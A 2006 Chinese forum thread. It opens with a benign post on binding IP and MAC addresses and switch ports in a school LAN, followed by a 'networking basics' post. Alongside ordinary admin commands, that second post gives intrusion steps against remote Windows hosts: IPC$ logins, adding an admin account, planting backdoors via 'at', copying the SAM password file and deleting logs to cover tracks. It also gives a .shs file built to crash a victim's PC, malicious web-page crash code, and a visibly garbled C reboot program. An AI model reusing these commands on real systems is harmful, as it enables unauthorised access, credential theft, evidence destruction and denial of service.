史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-05-20, 06:30 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 有效管理區域網路IP位址

區域網路的一大特點就是擁有一定數量的終端用戶。作為省屬重點中學,筆者所在學校區域網路的終端用戶有600多個,為了區分各類不同用戶,我們採用的是終端固定IP設定的方法。和其他許多學校的網管一樣,我們也一直被終端用戶私改IP位址造成的網路衝突問題困擾著。咨詢相關網路公司,他們也提供了不少解決方案,但大多價格不菲。沒有辦法,只好絞盡腦汁自己想辦法了。筆者採用了關於防火牆的IP位址與MAC位址綁定+關於交換機的MAC位址與連接阜綁定的二級管理方法,雙管齊下,較好地解決了這個問題。現將實現方法闡述如下:

一、關於防火牆的IP位址與MAC位址綁定

1. 做好整個區域網路終端用戶電腦的命名,指定IP位址

根據用戶的類別統一命名電腦,並給定IP位址。這樣一看機器名,就知道是哪個部門哪台機器,便於管理。比如高一年級語文組1號機器,我們就將其命名為「gaoyiyuwen01」。

同時,統一規劃分配IP位址給每台終端機器,並建立IP位址分配登記表(見附表)。

某中學區域網路ip位址綜合管理登記表


http://www.dvbbs.net/ShowImg.asp?p=/...550b7a55e5.gif


2. 統計每個終端機器網路卡的MAC位址,建立IP位址與MAC位址對應表

我們知道,在MS-DOS方式下按鍵輸入指令「Winipcfg」就可以獲得本地機IP位址和MAC位址(Windows 98系統下)。我們可以將此方法公佈一下,然後要求相關用戶將本地機MAC位址抄錄上報到網管中心,再進去行登記匯總。也可在設定機器名和IP位址時一併統計好。

網路管理員也可以利用Nbtstat指令來遠端獲得指定機器的MAC位址。在MS-DOS方式下按鍵輸入指令「Nbtstat -a 遠端電腦名稱」,即可獲得指定機器的IP位址和MAC位址。

3. 將IP位址與MAC位址綁定

這要根據區域網路接入網際網路的方式不同而採用不同的辦法。如果是採用代理伺服器接入網際網路,那就使用指令:

ARP -s IP位址 MAC位址

例:ARP -s 192.168.1.4 00-EO-4C-6C-08-75

這樣,就將靜態IP位址192.168.1.4與網路卡位址為00-EO-4C-6C-08-75的電腦綁定在一起了,即使別人盜用您的IP位址192.168.1.4,也無法通過代理伺服器上網。

如果是通過路由器直接接入網際網路,最好通過硬體防火牆來實現IP與MAC位址的綁定。一般的硬體防火牆都具有這個功能,具體操作也非常簡單。



到這裡似乎可以大功告成了,但事情並不像我們想像的那麼簡單。花了相當多的精力構築起來的防線不到一個月就又衝突依舊了。原來,有的終端用戶通過修改註冊表、下載專用小工具等方法,沒費多少力氣就更改了本地機的MAC位址,甚至於將本地機的MAC位址和IP位址改得和主伺服器一模一樣,搞得區域網路內又雞犬不寧了。

二、關於交換機的MAC位址與連接阜綁定

為了進一步解決這個問題,筆者又想到了關於交換機的MAC位址與連接阜綁定。這樣一來,終端用戶如果擅自改動本地機網路卡的MAC位址,該機器的網路訪問將因其MAC位址被交換機認定為非法而無法實現,自然也就不會對區域網路造成干擾了。

以思科3548交換機為例,登入進入交換機,輸入管理密碼進入組態模式,敲入指令:

(config)#mac_address_table permanent MAC位址 乙太網連接阜號

這樣逐一將每個連接阜與相應的電腦MAC位址綁定,儲存並結束。其他品牌的交換機只要是可以網管的,大多可以仿此操作。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
向 psac 送花的會員:
ahsali (2007-02-06)
感謝您發表一篇好文章
舊 2006-05-21, 06:40 AM   #2 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網路基礎知識大全

1)如何檢視本地機所開連接阜:

用netstat -a —n指令檢視!再stat下面有一些英文,我來簡單說一下這些英文具體都代表什麼

LISTEN:偵聽來自遠方的TCP連接阜的連接請求

SYN-SENT:再傳送連接請求後等待匹配的連接請求

SYN-RECEIVED:再收到和傳送一個連接請求後等待對方對連接請求的驗證

ESTABLISHED:代表一個開啟的連接

FIN-WAIT-1:等待遠端TCP連接中斷請求,或先前的連接中斷請求的驗證

FIN-WAIT-2:從遠端TCP等待連接中斷請求

CLOSE-WAIT:等待從本機用戶發來的連接中斷請求

CLOSING:等待遠端TCP對連接中斷的驗證

LAST-ACK:等待原來的發向遠端TCP的連接中斷請求的驗證

TIME-WAIT:等待足夠的時間以確保遠端TCP接收到連接中斷請求的驗證

CLOSED:沒有任何連接狀態


2)如何獲得一個IP位址的主機名?

利用ping -a ip 指令檢視!再第一行的pinging後面的 『ip』前面的英文就是對方主機名!

同樣道理,利用ping machine_name也可以得到對方的ip

獲得一個網站的ip位址的方法是:ping www.***.com

比如想知道sohu的ip,就用ping http://www.sohu.com/來檢視就可以了

順便說一句:如果返回:Reply from *.*.*.*: TTL expired in transit的話,哈哈,代表TTL(生命週期)在傳輸程序中過期

什麼意思呢?我來解釋一下!

導致這個問題出現的原因有兩個:1)TTL值太小!TTL值小於你和對方主機之間經過的路由器數目。 2)路由器數量太多,經過路由器的數量大於TTL值!

哈哈,其實這兩點是一個意思!只不過說法不同而已!


3)如何檢視本地機的ip位址?

用ipconfig來檢視就可以!

也可以再Windows中的開始選單,執行中輸入winipcfg,同樣可以看到自己的ip

ipconfig指令後面如果加一個參數 /all的話,可以得到更加詳細的資料,比如DNS、網路閘道等……


4)再使用net指令的時候遇到一些錯誤程式碼,如何檢視對應的錯誤訊息?

用指令 net helpmsg erorr_code來檢視就可以了

比如錯誤程式碼為:88

則檢視指令為:net helpmsg 88 下面有這個錯誤程式碼的中文顯示!


5)利用telnet連線到對方主機上,想獲得一些系統資訊,用什麼指令?

set指令可以很好的完成你所需要收集訊息的工作的!

方法:再cmd下直接輸入set(telnet對方主機以後,也是直接set就可以了~然後能夠得到NNNNN多的訊息)

再這裡,computername:哈哈,還用說麼?主機名!

OS=Windows_NT :作業系統的檔案類型哦~

path=C:\perl\bin\ :(perl的解釋器位置!)

systemDrive=c: 作業系統磁碟代號!

USERNAME=coldcrysky 當前登入使用機器的用戶

……

(6)跟蹤路由器的指令是什麼?

tracert 格式:tracert ip

中間會列出所有經過的路由器列表!這些路由器如果是暴露再防火牆外面的話,還可以看到路由的IP哦~哈哈(這裡又涉及到了另外一個問題:為什麼要把路由放在防火牆後面?原因呢,主要有兩點:1)保護路由器!因為現在越來越多的攻擊和入侵已經開始瞄準路由器了~如果直接把路由暴露在外面,哈哈,是非常危險的!被DoS了就不好了啊~哈哈,所以要放在防火牆裡面;2)為路由器減少負擔!如果所有的過濾功能統統都壓在路由器上面,哈哈,路由器的負擔就太大了!)

當然,利用pathping也可以達到同樣效果!格式與tracert一樣!


7)簡單介紹一下cookie!

cookie,又名小甜點。

它的作用:記錄訪問者的一些訊息。例如利用cookie記錄你所登入這個網頁的次數、登入時曾經輸入的訊息……

最一般的是,大家再登入論壇(郵信箱)的時候,經常在輸入第一個字母的時候,往往下面就顯示出了所有在本地機登入過該論壇(郵信箱)的用戶名吧?哈哈,這個就是cookie的作用!

大家在Administrator的cookies目錄中可以看到很多的記事本我的文件吧?這些都是cookie,雖然經過了加密,但是仔細搜尋的話,仍然能夠看到一些敏感訊息!況且現在也已經有了專門檢視cookie的軟體!利用這些軟體,你的隱私將不保哦~

那麼,如何清除cookie呢?一般情況下,可以在Internet選項中的一般選擇項中看到一個移除cookies的按鈕,點擊就可以清楚掉了~

除此以外,還要在internet選項中的內容選擇項中找到自動完成按鈕,把裡面的四項都選!然後點擊清除表單,清除密碼~

然後到作業系統目錄所在的分區中!進入Winnt(98為windows)目錄(當然了,這些都是預設值的目錄!如果你安裝的時候改名了,就對應的去相應目錄)之後找到Temporary Internet Files目錄(2000的目錄在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目錄下找Temporary Internet Files就可以了~,找到這個資料夾後,開啟!看到裡面有NNNNNNNNNNNN多的文件了麼?哈哈,這些是你瀏覽過的網頁的記錄(有的時候從網站上面看到漂亮的FLASH,可是不能儲存怎麼辦?只要在線瀏覽一遍以後,斷線到這裡來找*.swf,之後依次開啟檢視的話,相信你會找到你所需要的FLASH的!),好了,跑題了~繼續說:這些文件是網站的頁面記錄,直接移除就可以了!

另外,有沒有徹底禁止cookie的方法呢?

哈哈,當然有了!在IE的Internet選項中,找到隱私選擇項!,把裡面的滑塊拖到最上面,邊上寫著:阻止所有cookie,哈哈,是不是?

另外一種方法:找到Windows目錄下的cookies目錄!把裡面的txt文件全部移除!,最後應該只剩下一個index.dat文件!之後把這個資料夾設定成唯讀就可以了~

不過,禁止cookie後,大部分的論壇都無法正常登入了啊!哈哈,到底禁止不禁止就看你自己的了~


8)安裝2000的時候,速度會特別特別特別慢,怎麼加快安裝速度呢?

在DOS上面安裝,應該用98啟動光碟來啟始系統!然後按照下面的方法來做,可以提高安裝速度:

g:\>cd windows -------假設G為光碟 windows為98的安裝目錄!
g:\windows>smartdrv -------載入smartdrv程序!載入後沒有任何提示訊息!只要不返回錯誤訊息就是載入成功了~這時候安裝2K的話,速度會很快的哦~



9)Windows2K密碼忘記了,如何才能進入系統?

Windows2K的用戶配置資訊和密碼儲存在SAM文件裡!該檔案位於:c:\winnt\system32\config目錄中!只要移除這個文件就可以了~

另外,在c:\winnt\repair目錄中也同樣有一個SAM文件(這個是前者的制作備份!)如果你在登入目標物的時候,copy前面那個目錄中的SAM文件,你會發現COPY不下來!哈哈,為什麼?因為執行著的2K系統會保護SAM文件啊~這個時候你就COPY這個就可以了!


10)ping不到,tracert不到,但是卻能用nbtstat顯示對方的一些訊息,為什麼?

因為tracert和ping指令使用的是ICMP傳輸協定!而nbtstat是通過對方的netbios連接阜來獲得對方的主機訊息的!使用的是UDP和TCP傳輸協定!如果對方僅僅只對ICMP傳輸協定做了禁止的話,那通過這個指令獲得系統資訊是正常的!


11)telnet上去後,如何給對方開共享?

開共享的指令如下:net share c=c:\winnt\system 返回共享成功

之後直接利用\\ip\c來訪問對方的system目錄了~移除共享用

share c /del 指令就可以了


12)如何判斷對方的具體作業系統版本?

首先用ver指令檢視對方的版本號!

如果是5.00.2195的話,為2K;5.1.2600為XP

從這裡可以區分出來到底是2K還是XP了~下面進行更加具體的區分!

2K的pro和svr版本區分:

在telnet下,net shart檢視啟動的服務~如果對方開啟了Terminal Services服務的話,基本上可以判斷為svr以上的版本了~如果沒有開啟,則為pro!(具體方法有三種,因為前幾天在論壇中我回覆過暗界了~所以這裡就不再重複了~)

XP的pro和home版的區分:

home edition是無法安裝iis的!所以,可以通過iis服務來判斷到底是home版或者是pro了~

當然了,如果對方是pro,但是將iis移除(停用)的話,就沒辦法判斷了~哈哈


13)如何檢視98的隨機啟動的程序?

在98下有一個實用組態程序(msconfig),中文名為:系統組態實用程序,使用的方法是在:開始--執行中輸入msconfig,在裡面,有一個啟動的選擇項,點擊後,可以看到很多隨即啟動程序,如果前面帶有鉤的話,就是啟動時隨機啟動的,取消的話就是把前面的小鉤去掉就可以了~(如果在這裡檢視到了一些未知的啟動檔案--比如沒有文件的具體路徑,或者沒有檔案名的話,最好取消它的自啟動!因為很有可能是木馬!)

除了這裡以外,還有config.sys、autoexec.bat、system.ini、win.ini幾個選擇項,他們分別對應這幾個文件!只不過在這裡更方便檢視而已!



14)設定了BIOS密碼,可是卻忘記了,該怎麼辦?

如果是可以進入Windows的話,可以找找biospwds和cmospwd這兩個軟體看看~

還有利用DEBUG法:

簡單介紹兩種:

1)-o 70 16
-o 71 13
-q

2)-o 70 16
-o 71 16
-q

另一種方法:copy法:

copy con cmos.com

輸入下面10個字元:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然後按下F6並Enter鍵,結束,執行這個cmos.com程序就可以了~

嗯,如果不能進入Windows怎麼辦呢?

簡單介紹兩種方法:

1)用通用密碼:

Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

這是一般的密碼,不妨試試~

如果不行的話,可以利用CMOS放電:

就是把主機板上的電池取下來,等一會兒再插上去~


15)如何自製一個讓98顯示藍色的炸彈?

嗯,這個是前幾天QQ上面朋友問我的問題,整理的時候突然間想起來了,就寫一下好了~

首先,開啟Word,再插入表單中選項對象,這時,彈出對像包裝程序視窗,再這個視窗中,點擊匯入,隨便找一個文本或者程序就可以!之後點:編輯表單。這裡選項指令行,出現一個指令行視窗,在裡面協商c:\con\con,點擊儲存,完成後,再點編輯包中的複製包,把他隨便到一個地方複製下來,之後看到的是一個名位片斷的東西!給這個文件起一個名字,哈哈,傳給那個可憐的傢伙吧,等待他顯示藍色,離線!

(這個指令行中可以插入很多的指令,不見得非要用這個98顯示藍色漏洞哦~)順便說一下:這個已經不是什麼新鮮的技術了,這個技術的名字叫做:碎片對象。哈哈,碎片?記憶碎片麼?不是的!他的後面是:.shs!之所以說一下這個,是因為有的朋友還不知道~做一個整理而已!不知道的朋友看過後就知道了,知道的朋友就權當複習了~另外,不要利用這個方法做破壞!否則後果自負!


16)如何再指令行下殺死對方行程?

利用微軟的2K以上作業系統都是含有這個工具的!該工具包含在2K光碟的\support\tools資料夾下!裡面有安裝程序,點擊後,就安裝了2K的support tools工具包,裡面有kill這個工具,這時候再cmd下可以輸入kill/?,就可以看到說明 了,使用這個指令的格式是:kill pid (pid是行程的ID號!)再工作管理器中可以看到行程的ID號!(不知道有幾位朋友用過藍色火焰?哈哈,用法跟這個一摸一樣!還有很多類似的木馬、後門軟體都有類似的功能!這個是windows原有的的大木馬『後門工具』而已!)

這時候,有朋友問了,那再指令行下如何檢視行程呢?哈哈,這就用到了系統原有的的有一個後門工具了:再剛才說得那個目錄中,還有一個工具叫tlist 看名字就能看出來是幹什麼的吧?用法更簡單!直接輸入tlist就可以得到pid遇隊形程序的列表了~

那對方機器如果沒有安裝這兩個程序怎麼辦呢?沒關係,你把你作業系統磁碟代號下面programfiles\support tools目錄下面的這兩個對應的exe文件上傳到對方的winnt\system32目錄中就可以了!哈哈~


17)上次說了ping的基本用法,這次談談ping的指令參數!

這個是本次問題集的重點部分!無論是小鳥還是老鳥,你們能保證你真的對這些參數瞭如指掌麼?恐怕都未必!還是好好看看吧!

這是TCP/IP傳輸協定中最有用的指令之一

它給另一個系統傳送一系列的資料包,該系統本身又發回一個回應,這條實用程序對搜尋遠端主機很有用,它返回的結果表示是否能到達主機,宿主機傳送一個返回資料包需要多長時間。

Usage: ping 〔-t〕 〔-a〕 〔-n count〕 〔-l size〕 〔-f〕 〔-i TTL〕 〔-v TOS〕
〔-r count〕 〔-s count〕 〔〔-j host-list〕 〔-k host-list〕〕
〔-w timeout〕 destination-list

Options:

-t Ping the specifed host until interrupted.(除非人為中止,否則一直ping下去)

-a Resolve addresses to hostnames.(把IP轉為主機名)

-n count Number of echo requests to send.(回應請求的數量)

-l size Send buffer size.(封包的大小)

-f Set Don`t Fragment flag in packet.(訊息包中無碎片)

-i TTL Time To Live.(時間)

-v TOS Type Of Service.(服務檔案類型)

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.(較嚴格的……唉,怎麼譯好……算了,放著吧)

-w timeout Timeout in milliseconds to wait for each reply.(timeout的時間)

比如大家可能都知道的一個指令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國佬時所用的指令(當然這樣只會造成我方自己的網路阻塞)。

其實這個指令主要是用來看對方回應的速度,如果怎麼ping 得到的結果都是request time out。那恐怕你根本就不用你去找這台主機了,它不在你的射程之內。


18)如何檢視本地機的DNS伺服器?

ipconfig其實是可以的(哈哈,上次就介紹過這個指令),除此以外,還可以利用一個指令:再cmd下輸入netsh,進入到netsh>提示號,再輸入:int ip 進入到interface ip> 然後再次輸入dump,這時候螢幕上出現當前連接的組態情況了

這裡必須介紹一下netsh到底是作什麼用的!這個指令比較複雜,他包含了很多的子指令,所以這裡只對部分指令進行講解:

1)檢視本地機IP:首先按鍵輸入netsh,再netsh>提示號下輸入:interface Enter鍵 之後:ip Enter鍵 再之後:show address Enter鍵 這樣,就可以看到當前連接的IP位址和子網路遮罩。(其實這個指令不如ipconfig簡單,也不如ipconfig/all全面)

2)修改網路組態:接著上面的指令,我們使用:set address name=「本機連接」 source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了現用的IP位址,用show address來看看(或者用ipconfig)

3)顯示一個完整的網路組態教本:

剛才說過,第一個指令顯示的訊息不如ipconfig/all全面,不用著急,netsh再列印顯示網路組態上,還是有自己的特色的!例如:再interface ip>狀態下輸入:dump,會顯示一個清單,顯示所有本機連接(不管你是否使用~)與netstat -an不完全一樣!

這就是netsh的簡單介紹和最基礎的用法!希望大家能夠掌握!還可以輸入?來檢視說明 !(要在netsh>提示號下才能檢視說明 啊~)


19)目標物上的部分文件無法移除,怎麼辦?

如果對方的資料夾是唯讀的話,會出現拒絕訪問的字樣!這時候,我們可以再del指令後面加上/f參數來移除!


20)再說一個可以限制用戶登入時間的指令!

再net指令中就可以實現這樣的功能!具體方法如下:

假如我們打算讓:coldcrysky這個用戶再週日到周易的上午八點到下午四點之間可以登入,用這個指令:

net user coldcrysky /timesunday-monday,08:00-16:00

之後利用net user coldcrysky指令來檢視登入時間的限制,可以看到是我們所規定的時間(因為是中文的,很容易懂,我就不多廢話了)

在此,特別提醒各位:指令中:星期日才是一周的開始!!!不要當成星期一!

光說了怎麼設定,如果想恢復回去怎麼辦呢?(就是恢復成預設值狀態,任何時間都可以登入的狀態)

看我的:net user coldcrysky /time:all --這樣就可以了~

22)如何移除windows2K的預設值貢獻?

首先開啟記事本,輸入如下內容:

net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete

這裡的c$、d$、e$……是代表預設值共享的磁碟代號~又幾個就設定幾個就可以了~

之後點擊儲存成批次處理文件(後面為:bat的文件!)!加入到啟動組中就可以了~


23)139連接阜的又一用法

哈哈,寫這個帖子的原因是因為我答應給一個朋友回覆139連接阜的作用來著……先聲明兩點:1)不要利用本帖所提到的方法去搞惡意破壞!2)哈哈,可能許多人已經知道了139連接阜這個用法了~本文只想起到一個拋磚引玉的作用!

廢話不多說了~開始:

如果你使用NT主機的話,那你可要注意了!
重新啟動NT主機的方法如下:

1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一個IPC連接

2:net use H: \\XXX.XXX.XXX.XXX\C$
將對方的C碟映射為自己的h盤

3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在對方的C碟上產生一個能重新啟動機器的文件

4:net time \\XXX.XXX.XXX.XXX
得到對方機器時間

5:at \\XXX.XXX.XXX.XXX 重新啟動的時間 c:\reboot.bat
設定對方重新啟動的時間!

6:at \\XXX.XXX.XXX.XXX
檢視工作上面是否增加了這個工作

7:等對方重新啟動好了~

上面的第三步是only for Win2K的,如果是Nt,就需要用意個指定的重新啟動程序,我們可以自己編寫一個reboot.exe來替代reboot.bat,程式碼如下:
#i nclude "stdio.h"
#i nclude "windows.h"
int main()
{
文件://定義重新啟動的時候傳送給所有用戶的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://嘗試用最簡單的API函數重新啟動
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因為上面的重新啟動不成功,所以需要調整本行程的特權
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://獲取重新啟動的特權 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判斷是NT內核還是9X內核,選項用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;

對了,再次說明啊,別用本文提到的方法搞破壞,小心警察叔叔打PP~哈哈


24)利用批次處理文件來建立一個記錄3389登入者訊息的記錄器

由於Terminal Service預設值是沒有日誌記錄的,只能依靠他的系統日誌,但是系統日誌只能記錄一些大動作(開啟或停止服務),那麼,如何用批次處理文件來編寫一個將是3389連接阜的程序呢?很簡單:

建立一個批次處理文件:內容如下:

@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389

之後儲存!

如果有人用你的3389登入你的機器,哈哈,在c碟下就有3389log.txt這個文件!記錄了當天日誌,還有連接時間……資料~開始反擊~哈哈


25)網路指令小節

A、NET指令:

IPC連接:格式 net use \\對方IP\ipc$ "密碼" user:"用戶名" 『建立IPC連接~』
net use \\對方IP\ipc$ /delete 『中斷連線連接~』

以下操作需要在連線到對方主機後才可進行!!!

net user coldcrysky xyz /add 『在連接的目標主機中加入一個用戶名為COLDCRYSKY 密碼為WYZ的用戶』

net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著權限的提高啊!!!^_^』

net use z:\\對方IP\C$ 『把對方的C碟映射為本地機的Z盤-可依照需要更改映射磁碟代號!』
net start telnet 『開啟TELNET』
net user guest /active:yes 『啟動GUEST』
net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』

B、AT指令:

檢視遠端機時間:net time \\對方IP

加入一項新工作:

at \\對方IP 時間 檔案名 『用來把自己上傳的後門程序在制定時間執行,方便以後進入目標物!』

C、TELNET指令:

telnet 對方IP 連接阜 『作用不用我說了吧???』

D、FTP指令:

登入:ftp 對方網址(IP位址)
上傳文件:get 文件在本地機完整路徑 對方文件存放完整路徑
下載文件:put 對方文件完整路徑 本地機存放文件路徑

E、COPY指令:

在建立連接後(尤其是IPC$連接後,很有用的指令哦~)
1copy index.htm \\127.0.0.1\c$\index.htm
『將本地機index.htm文件複製到127.0.0.1的C碟下,如果要放到對方的NT目錄下,則把C改為admin$』
2copy \\127.0.0.1\admin\repair\sam_ c: 『將遠端機資料庫檔案拷貝到本地機C碟根目錄下』F、SET指令:

主要用於分析目標電腦的基本訊息用!具體使用方法請搜尋相關文件!

G、NBTSTAT指令:

nbtstat -A 對方IP (這個A大寫)

『在其中顯示<037>前面的英文或數位就是電腦名稱稱!當然,也可以利用PING -A 對方ip的方法來檢視對方主機名!效果相同!!!』

H、SHUTDOWN指令:

『用來關閉對方NT服務的指令』格式如下:
shutdown \\IP位址 t:20
『20秒後自動關閉對方NT服務!由於對對方機器影響較大,慎用!!!』

I、DIR指令:

還用我說麼?大家是不是早就該掌握了???(不知道的還是查閱相關資料吧~~~)

J、ECHO指令:

echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』

K、ATTRIB指令:

更改文件內容用,格式:
Attrib -r index.htm 『去掉唯讀內容』(+- 分別代表增加和減少)

L、DEL指令:

『移除日誌的時候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log

M、PING指令:

-t :ping制定IP,知道網路中斷連線或按CTRL+C結束!
-a :解釋PING IP的主機名
-n count :傳送count指定的ECHO資料包,預設值為4個!


26)這裡我必須(或者說不得不重新重申一個指令!不過說之前我要把這個指令的相關指令稍微介紹一下!)

我要說的指令就是:開啟服務和停止服務的net start and net stop

這兩個指令大多數朋友已經很熟悉了吧?不過為了方便更多的菜鳥能看明白我要說的意思,不用再看其他相關文章,所以我簡單說兩句:net start是開啟服務!那麼,如何開啟呢?比如,我們這裡要開啟telnet服務,那就直接再2K的cmd下輸入:net start telnet就OK了~關閉一項服務的話,把start換成stop就OK了~不過這裡必須要注意:你所關閉的服務必須是已經開啟的服務!!!好像是一句廢話

OK,有了這個前提後,下面就繼續介紹:那麼,net start和net stop到底能開啟什麼服務?其實這點也不需要你強記,記住這個指令就可以了:net help start和net help stop,這兩個會顯示出你所能開啟的服務有那些~~

這裡比如我們查到了這個服務「CLIENT SERVICE FOR NETWARE」,那麼當這個指令使用net start和net stop的時候,你必須在這項服務上面加上「」,原因是因為這個服務名稱中帶有空格!如果服務名稱中不帶空格,你可以不用帶這個引號!!!這點是我強調的問題!大家一定不要忘記了!『前些天看到S8S8.net的黑白新區中有人說net start 和 net stop後面的服務名必須帶空格是錯誤的!明白原因了吧?』


27)關於雙系統的兩個問題:

A、如何在雙系統(98、2000)中安全移除2K?

先製作一張Windows 98 的啟動軟碟,再用它啟動你的電腦,執行sys指令恢復Windows 98啟始記錄後,再執行fdisk/mbr恢復硬碟分區表,完成後進入Windows 98,把winnt 和system volumn information 目錄移除,再刪掉C碟上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。

B、 Windows 98/XP雙系統啟動表單修復

1.修復前,在BIOS中設定從光碟啟動。用Windows XP安裝碟啟動電腦,在載入必要的驅動後,出現Windows XP的安裝介面。有三個選項:

(1)要現在開始安裝Windows XP,請按「Enter」鍵。

(2)要用「恢復控制台」修復Windows XP安裝,按「R」鍵。

(3)要結束安裝程序,不安裝Windows XP,按「F3」鍵;

2. 按「R」鍵,進入「Microsoft Windows XP (TM) 故障恢復控制台」介面;故障恢復控制台提供系統修復和故障恢復功能。系統這時會搜尋已安裝的Windows XP系統檔案,然後顯示搜尋結果,並詢問「要登入到哪個Windows XP安裝(要取消,請按Enter)」,選項1. D:\Windows,Enter鍵,系統會再詢問「管理員密碼」,再按鍵輸入安裝Windows XP時設定的管理員密碼,Enter鍵,出現D:\Windows〉,這時需要輸入修覆命令Fixboot,後面的參數為啟動扇區要寫入的磁牒磁碟代號,這裡填入C:,Enter鍵。修復完成,按鍵輸入Exit結束。重新啟動後就會看到久違的雙重新啟動動表單了。並且,這樣修復後基本不產生垃圾文件。

因為這兩個問題是非常非常普遍的,所以我就收集到這裡了~


28)這裡說幾個主頁惡意程式碼:『並不是讓大家把這些程式碼加入到自己的主頁中!只是希望大家能瞭解惡意程式碼,起到更好的防護作用!』

A、死循環程式碼:
『把下列程式碼加入到網頁中,可達到如上效果』
<img src="/javascript:location="「網頁的檔案名.htm:」>

說明:當含有這段程式碼的網頁被人點擊,連接就會不斷的開啟IE瀏覽器,直到你的系統資源浪費到0%~只有重新啟動才能正常使用!

預防方法:禁用所有的ActiveX控件和插件!因為這是一個ActiveX教本程序~

B、恐怖的大圖片:
『把下列程式碼加入到網頁中,可達到如上效果』
<img src= "http://恐怖圖片的連接位址" width= "1" height= "100000000000000000000000">

說明:當開啟這樣的網頁,IE會不斷的解釋試圖開啟,但由於圖片實在太大,超出了其處理能力,所以……

C、地震當機程式碼:
『把下列程式碼加入到網頁中,可達到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:\con\con">

說明:<img src="c:\con\con">是windows9x的設備名稱解析漏洞!
WINDOWS9x的\con\con設備名稱解析漏洞允許用戶進行攻擊,倒是98當機。原理:我們知道,CON是DOS下的特殊設備名,不允許做檔案名,如果我們在DOS下按鍵輸入如下指令:copy coldcrysky.txt con,系統會顯示coldcrysky.txt的內容,如果換成:copy coldcrysky.txt>con系統會提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN,則輸出coldcrysky.txt到列印機。由此可見,CON代表文件本身,如果使用\CON\CON指令,則意味著系統不斷使用文件本身,視系統資源迅速枯竭,連按CTRL+ALT+DEL的機會都沒有~
解決辦法:
對於9X系統,強烈建議打修正檔!!!2000和XP則不會當機~

